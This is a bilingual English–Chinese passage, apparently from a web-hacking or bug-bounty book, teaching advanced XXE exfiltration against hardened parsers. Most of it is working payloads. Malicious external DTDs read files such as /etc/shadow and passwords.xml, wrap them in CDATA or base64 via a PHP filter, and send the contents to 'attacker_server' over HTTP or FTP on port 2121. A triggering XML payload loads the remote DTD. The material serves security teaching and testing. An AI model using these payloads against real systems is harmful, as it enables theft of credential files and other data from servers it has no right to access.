Question

XXE data exfiltration becomes more complicated if the parser is hardened against XXE attacks, and if you are trying to read files of specific formats. But there are always more ways to bypass restrictions!

如果解析器具有硬化对抗 XXE 攻击的特性，并且你尝试读取特定格式的文件，则 XXE 数据泄露将变得更加复杂。但总有更多的方法来绕过限制！

Sometimes you’ll want to exfiltrate files that contain XML special characters, such as angle brackets ( <> ), quotes ( " or ' ), and the ampersand ( & ). Accessing these files directly via an XXE would break the syntax of your DTD and interfere with the exfiltration. Thankfully, XML already has a feature that deals with this issue. In an XML file, characters wrapped within CDATA (character data) tags are not seen as special characters. So, for instance, if you’re exfiltrating an XML file, you can rewrite your malicious external DTD as follows:

有时候，您会想窃取包含 XML 特殊字符的文件，比如尖括号（<>），引号（“或者'），和字符&（和）。直接通过 XXE 访问这些文件会破坏 DTD 语法，并干扰窃取。幸运的是，XML 已经有一个可以解决这个问题的功能。在 XML 文件中，被 CDATA（字符数据）标签装起来的字符不被视为特殊字符。因此，如果您要窃取一个 XML 文件，您可以将恶意的外部 DTD 按以下方式重写：

1 <!ENTITY % file SYSTEM "file:///passwords.xml">
2 <!ENTITY % start "<![CDATA[">
3 <!ENTITY % end "]]>">
4 <!ENTITY % ent "<!ENTITY &#x25; exfiltrate
'http://attacker_server/?%start;%file;%end;'>">
%ent;
%exfiltrate;

This DTD first declares a parameter entity that points to the file you want to read 1 . It also declares two parameter entities containing the strings "<![CDATA[" and "]]>" 2 3 . Then it constructs an exfiltration URL that will not break the DTD’s syntax by wrapping the file’s contents in a CDATA tag 4 . The concatenated exfiltrate entity declaration will become the following:

该 DTD 首先声明了一个参数实体，该实体指向您想要读取的文件 1。它还声明了两个参数实体，包含字符串“<![CDATA[`”和“]]>”2 3。然后，它构建了一个外泄 URL，通过将文件内容包装在一个 CDATA 标记中，不会破坏 DTD 的语法 4。连接的外渗实体声明将成为以下内容：

<!ENTITY % exfiltrate 'http://attacker_server/?<![CDATA[CONTENTS_OF_THE_FILE]]>'>

You can see that our payloads are quickly getting complicated. To prevent accidentally introducing syntax errors to the payload, you can use a tool such as XmlLint ( https://xmllint.com/ ) to ensure that your XML syntax is valid.

你可以看到我们的有效载荷正在迅速变得复杂。为了防止无意间引入语法错误到有效负载中，你可以使用工具如 XmlLint(https://xmllint.com/) 来确保你的 XML 语法是有效的。

Finally, send your usual XML payload to the target to execute the attack:

最后，向目标发送常规的 XML 负载以执行攻击：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE example [
  <!ENTITY % xxe SYSTEM "http://attacker_server/xxe.dtd">
  %xxe;
]>

Another way of exfiltrating files with special characters is to use a PHP URL wrapper. If the target is a PHP-based app, PHP wrappers let you convert the desired data into base64 format so you can use it to read XML files or even binary files:

使用 PHP URL 包装器是另一种具有特殊字符的文件外泄方式。如果目标是基于 PHP 的应用程序，则可以使用 PHP 包装器将所需数据转换为 base64 格式，以便读取 XML 文件甚至二进制文件。

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/shadow">
<!ENTITY % ent "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker_server/?%file;'>">
%ent;
%exfiltrate;

The File Transfer Protocol (FTP) can also be used to send data directly while bypassing special character restrictions. HTTP has many special character restrictions and typically restricts the length of the URL. Using FTP instead is an easy way to bypass that. To use it, you need to run a simple FTP server on your machine and modify your malicious DTD accordingly. I used the simple Ruby server script at https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb :

文件传输协议（FTP）也可用于直接发送数据，绕过特殊字符限制。HTTP 有许多特殊字符限制，通常限制 URL 的长度。使用 FTP 代替它是一个轻松的绕过方法。为了使用它，你需要在你的机器上运行一个简单的 FTP 服务器，并相应修改你的恶意 DTD。我在 https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb 使用了简单的 Ruby 服务器脚本。

<!ENTITY % file SYSTEM "file:///etc/shadow">
<!ENTITY % ent "<!ENTITY &#x25; exfiltrate SYSTEM
1 'ftp://attacker_server:2121/?%file;'>">
%ent;
%exfiltrate;

We are using port 2121 here because the Ruby FTP server we are using runs on port 2121, but the correct port to use depends on how you run your server 1 .

我们使用 2121 端口，因为我们正在使用的 Ruby FTP 服务器在 2121 端口上运行，但正确的端口取决于您如何运行您的服务器 1。